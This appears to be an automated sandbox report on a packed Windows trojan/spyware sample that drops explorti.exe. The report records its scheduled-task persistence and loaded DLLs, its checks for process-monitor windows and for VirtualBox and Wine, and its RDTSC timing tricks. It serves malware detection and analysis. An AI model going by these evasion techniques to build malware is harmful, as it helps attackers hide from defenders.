Source: file.exe	Static PE information: Section: ZLIB complexity 0.9996691427595629
Source: file.exe	Static PE information: Section: wugfyyhr ZLIB complexity 0.9944699754901961
Source: explorti.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9996691427595629
Source: explorti.exe.0.dr	Static PE information: Section: wugfyyhr ZLIB complexity 0.9944699754901961

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/3@0/2

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

File created: C:\Users\user\AppData\Roaming\1000051000\

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: file.exe

Static file information: File size 1900032 > 1048576

Source: file.exe

Static PE information: Raw size of wugfyyhr is bigger than: 0x100000 < 0x19e600

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.d60000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wugfyyhr:EW;mmvmwoim:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wugfyyhr:EW;mmvmwoim:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 1.2.explorti.exe.530000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wugfyyhr:EW;mmvmwoim:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wugfyyhr:EW;mmvmwoim:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 2.2.explorti.exe.530000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wugfyyhr:EW;mmvmwoim:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wugfyyhr:EW;mmvmwoim:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 6.2.explorti.exe.530000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wugfyyhr:EW;mmvmwoim:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wugfyyhr:EW;mmvmwoim:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: explorti.exe.0.dr	Static PE information: real checksum: 0x1da51b should be: 0x1d54cc
Source: file.exe	Static PE information: real checksum: 0x1da51b should be: 0x1d54cc

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: wugfyyhr
Source: file.exe	Static PE information: section name: mmvmwoim
Source: file.exe	Static PE information: section name: .taggant
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: .idata
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: wugfyyhr
Source: explorti.exe.0.dr	Static PE information: section name: mmvmwoim
Source: explorti.exe.0.dr	Static PE information: section name: .taggant

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 6_2_0054D84C push ecx; ret

6_2_0054D85F

Source: file.exe	Static PE information: section name: entropy: 7.978167044065446
Source: file.exe	Static PE information: section name: wugfyyhr entropy: 7.953087307539596
Source: explorti.exe.0.dr	Static PE information: section name: entropy: 7.978167044065446
Source: explorti.exe.0.dr	Static PE information: section name: wugfyyhr entropy: 7.953087307539596

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\explorti.job

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F46F14 second address: F46F1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F462ED second address: F462F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F46868 second address: F46899 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F20h 0x00000007 jno 00007FFAAD0A8F16h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 jg 00007FFAAD0A8F16h 0x00000019 jmp 00007FFAAD0A8F1Ch 0x0000001e pop ebx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F46899 second address: F468AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FFAACBEF8C6h 0x00000009 jo 00007FFAACBEF8C6h 0x0000000f popad 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4A546 second address: F4A5D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F26h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d je 00007FFAAD0A8F22h 0x00000013 jne 00007FFAAD0A8F1Ch 0x00000019 pop eax 0x0000001a sub dword ptr [ebp+122D312Eh], ecx 0x00000020 push 00000003h 0x00000022 or edx, dword ptr [ebp+122D2B15h] 0x00000028 push 00000000h 0x0000002a mov dword ptr [ebp+122D3B50h], eax 0x00000030 mov edi, dword ptr [ebp+122D232Ch] 0x00000036 push 00000003h 0x00000038 push 00000000h 0x0000003a push esi 0x0000003b call 00007FFAAD0A8F18h 0x00000040 pop esi 0x00000041 mov dword ptr [esp+04h], esi 0x00000045 add dword ptr [esp+04h], 00000019h 0x0000004d inc esi 0x0000004e push esi 0x0000004f ret 0x00000050 pop esi 0x00000051 ret 0x00000052 mov ch, ah 0x00000054 mov si, C8E0h 0x00000058 call 00007FFAAD0A8F19h 0x0000005d jmp 00007FFAAD0A8F1Ch 0x00000062 push eax 0x00000063 push eax 0x00000064 push edx 0x00000065 pushad 0x00000066 push edx 0x00000067 pop edx 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4A5D9 second address: F4A5DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4A5DE second address: F4A606 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e jmp 00007FFAAD0A8F1Ah 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4A606 second address: F4A614 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4A614 second address: F4A659 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c push edi 0x0000000d ja 00007FFAAD0A8F16h 0x00000013 pop edi 0x00000014 jmp 00007FFAAD0A8F1Eh 0x00000019 popad 0x0000001a pop eax 0x0000001b mov dx, 9439h 0x0000001f lea ebx, dword ptr [ebp+1244F3F5h] 0x00000025 pushad 0x00000026 mov edi, 35AD5A9Dh 0x0000002b xor ebx, dword ptr [ebp+122D2C19h] 0x00000031 popad 0x00000032 push eax 0x00000033 pushad 0x00000034 jnp 00007FFAAD0A8F1Ch 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4A6E0 second address: F4A6E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4A6E4 second address: F4A74D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 add dword ptr [esp], 40808A73h 0x0000000e or dword ptr [ebp+122D1953h], ecx 0x00000014 push 00000003h 0x00000016 mov edi, 31AF8C04h 0x0000001b push 00000000h 0x0000001d stc 0x0000001e push 00000003h 0x00000020 sub dword ptr [ebp+122D1857h], edx 0x00000026 movsx edi, ax 0x00000029 push 80060215h 0x0000002e push eax 0x0000002f pushad 0x00000030 push edi 0x00000031 pop edi 0x00000032 jmp 00007FFAAD0A8F1Dh 0x00000037 popad 0x00000038 pop eax 0x00000039 xor dword ptr [esp], 40060215h 0x00000040 mov dword ptr [ebp+122D18C1h], eax 0x00000046 lea ebx, dword ptr [ebp+1244F3FEh] 0x0000004c jmp 00007FFAAD0A8F1Ah 0x00000051 xchg eax, ebx 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 jo 00007FFAAD0A8F16h 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4A74D second address: F4A753 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4A7CC second address: F4A802 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c jnl 00007FFAAD0A8F18h 0x00000012 push ebx 0x00000013 push edx 0x00000014 pop edx 0x00000015 pop ebx 0x00000016 popad 0x00000017 nop 0x00000018 mov ecx, dword ptr [ebp+122D3204h] 0x0000001e push 00000000h 0x00000020 mov di, cx 0x00000023 push 72CD8846h 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c pop eax 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3FD0A second address: F3FD16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FFAACBEF8C6h 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3FD16 second address: F3FD51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FFAAD0A8F26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ecx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3FD51 second address: F3FD73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FFAACBEF8C6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007FFAACBEF8C6h 0x00000013 jmp 00007FFAACBEF8CFh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F69E17 second address: F69E34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007FFAAD0A8F22h 0x00000011 jns 00007FFAAD0A8F16h 0x00000017 jns 00007FFAAD0A8F16h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F69E34 second address: F69E52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FFAACBEF8D8h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F69E52 second address: F69E56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6A4D7 second address: F6A4DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6A663 second address: F6A667 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6A667 second address: F6A671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6A671 second address: F6A68D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6A68D second address: F6A6B1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FFAACBEF8D8h 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007FFAACBEF8C6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6A6B1 second address: F6A6C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007FFAAD0A8F16h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6A6C3 second address: F6A6CD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6A6CD second address: F6A6D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6A6D3 second address: F6A6D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6A6D9 second address: F6A6DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6A6DE second address: F6A6E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6A9DB second address: F6A9E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6A9E5 second address: F6A9E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5F9A8 second address: F5F9B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007FFAAD0A8F16h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5F9B7 second address: F5F9BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
